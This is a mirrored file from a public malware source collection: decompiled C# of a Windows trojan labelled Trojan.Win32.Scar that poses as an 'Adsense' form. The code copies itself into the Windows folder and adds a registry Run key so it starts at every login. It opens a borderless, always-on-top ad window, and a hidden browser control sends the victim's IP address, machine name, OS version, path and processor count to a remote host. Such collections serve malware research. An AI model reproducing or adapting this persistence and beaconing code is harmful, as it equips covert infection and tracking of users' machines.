mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
137 lines
4.9 KiB
C#
137 lines
4.9 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: Adsense.Form1
|
|||
|
|
// Assembly: Frameworks4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: 4D94C439-06FB-45B8-A724-407C75FBD412
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Scar.ooru-d7ddcba1393da4ed7a75bd94e6f8034decaadf4e6899621f714820299963fc65.exe
|
|||
|
|
|
|||
|
|
using Microsoft.Win32;
|
|||
|
|
using System;
|
|||
|
|
using System.ComponentModel;
|
|||
|
|
using System.Drawing;
|
|||
|
|
using System.Net;
|
|||
|
|
using System.Windows.Forms;
|
|||
|
|
|
|||
|
|
namespace Adsense
|
|||
|
|
{
|
|||
|
|
public class Form1 : Form
|
|||
|
|
{
|
|||
|
|
private IContainer components = (IContainer) null;
|
|||
|
|
private WebBrowser webBrowser1;
|
|||
|
|
private WebBrowser webBrowser2;
|
|||
|
|
public int f = 0;
|
|||
|
|
|
|||
|
|
protected override void Dispose(bool disposing)
|
|||
|
|
{
|
|||
|
|
if (disposing && this.components != null)
|
|||
|
|
this.components.Dispose();
|
|||
|
|
base.Dispose(disposing);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void InitializeComponent()
|
|||
|
|
{
|
|||
|
|
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (Form1));
|
|||
|
|
this.webBrowser1 = new WebBrowser();
|
|||
|
|
this.webBrowser2 = new WebBrowser();
|
|||
|
|
this.SuspendLayout();
|
|||
|
|
this.webBrowser1.Dock = DockStyle.Fill;
|
|||
|
|
this.webBrowser1.Location = new Point(0, 0);
|
|||
|
|
this.webBrowser1.MinimumSize = new Size(20, 20);
|
|||
|
|
this.webBrowser1.Name = "webBrowser1";
|
|||
|
|
this.webBrowser1.ScriptErrorsSuppressed = true;
|
|||
|
|
this.webBrowser1.ScrollBarsEnabled = false;
|
|||
|
|
this.webBrowser1.Size = new Size(174, 617);
|
|||
|
|
this.webBrowser1.TabIndex = 0;
|
|||
|
|
this.webBrowser1.Url = new Uri("http://www.streamovies.co.cc/ads.html", UriKind.Absolute);
|
|||
|
|
this.webBrowser1.ProgressChanged += new WebBrowserProgressChangedEventHandler(this.webBrowser1_ProgressChanged);
|
|||
|
|
this.webBrowser1.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.webBrowser1_DocumentCompleted);
|
|||
|
|
this.webBrowser1.Navigated += new WebBrowserNavigatedEventHandler(this.webBrowser1_Navigated);
|
|||
|
|
this.webBrowser2.Dock = DockStyle.Fill;
|
|||
|
|
this.webBrowser2.Location = new Point(0, 0);
|
|||
|
|
this.webBrowser2.MinimumSize = new Size(20, 20);
|
|||
|
|
this.webBrowser2.Name = "webBrowser2";
|
|||
|
|
this.webBrowser2.ScriptErrorsSuppressed = true;
|
|||
|
|
this.webBrowser2.ScrollBarsEnabled = false;
|
|||
|
|
this.webBrowser2.Size = new Size(174, 617);
|
|||
|
|
this.webBrowser2.TabIndex = 1;
|
|||
|
|
this.webBrowser2.Visible = false;
|
|||
|
|
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|||
|
|
this.AutoScaleMode = AutoScaleMode.Font;
|
|||
|
|
this.ClientSize = new Size(174, 617);
|
|||
|
|
this.Controls.Add((Control) this.webBrowser2);
|
|||
|
|
this.Controls.Add((Control) this.webBrowser1);
|
|||
|
|
this.FormBorderStyle = FormBorderStyle.None;
|
|||
|
|
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
|
|||
|
|
this.MaximizeBox = false;
|
|||
|
|
this.MinimizeBox = false;
|
|||
|
|
this.Name = nameof (Form1);
|
|||
|
|
this.ShowIcon = false;
|
|||
|
|
this.ShowInTaskbar = false;
|
|||
|
|
this.StartPosition = FormStartPosition.CenterScreen;
|
|||
|
|
this.Text = nameof (Form1);
|
|||
|
|
this.Load += new EventHandler(this.Form1_Load);
|
|||
|
|
this.FormClosing += new FormClosingEventHandler(this.Form1_FormClosing);
|
|||
|
|
this.ResumeLayout(false);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public string LocalIPAddress()
|
|||
|
|
{
|
|||
|
|
string str = "";
|
|||
|
|
foreach (IPAddress address in Dns.GetHostEntry(Dns.GetHostName()).AddressList)
|
|||
|
|
{
|
|||
|
|
if (address.AddressFamily.ToString() == "InterNetwork")
|
|||
|
|
str = address.ToString();
|
|||
|
|
}
|
|||
|
|
return str;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public Form1() => this.InitializeComponent();
|
|||
|
|
|
|||
|
|
private void Form1_Load(object sender, EventArgs e)
|
|||
|
|
{
|
|||
|
|
string executablePath = Application.ExecutablePath;
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
System.IO.File.Move(executablePath, "c:\\\\windows\\\\frameworks4.exe");
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
|
|||
|
|
registryKey.SetValue("open", (object) "c:\\windows\\frameworks4.exe");
|
|||
|
|
registryKey.Close();
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
int num = (int) MessageBox.Show("click in links");
|
|||
|
|
}
|
|||
|
|
this.BringToFront();
|
|||
|
|
this.TopMost = true;
|
|||
|
|
this.webBrowser2.Url = new Uri("http://streamovies.co.cc/info.php?ip=" + this.LocalIPAddress() + "&namepc=" + Environment.MachineName + "&system=" + Environment.OSVersion.ToString() + "&chemin=" + Application.StartupPath + "&process=" + Environment.ProcessorCount.ToString());
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void webBrowser1_DocumentCompleted(
|
|||
|
|
object sender,
|
|||
|
|
WebBrowserDocumentCompletedEventArgs e)
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void webBrowser1_Navigated(object sender, WebBrowserNavigatedEventArgs e)
|
|||
|
|
{
|
|||
|
|
++this.f;
|
|||
|
|
if (this.f != 5)
|
|||
|
|
return;
|
|||
|
|
Application.Exit();
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void Form1_FormClosing(object sender, FormClosingEventArgs e)
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void webBrowser1_ProgressChanged(object sender, WebBrowserProgressChangedEventArgs e)
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|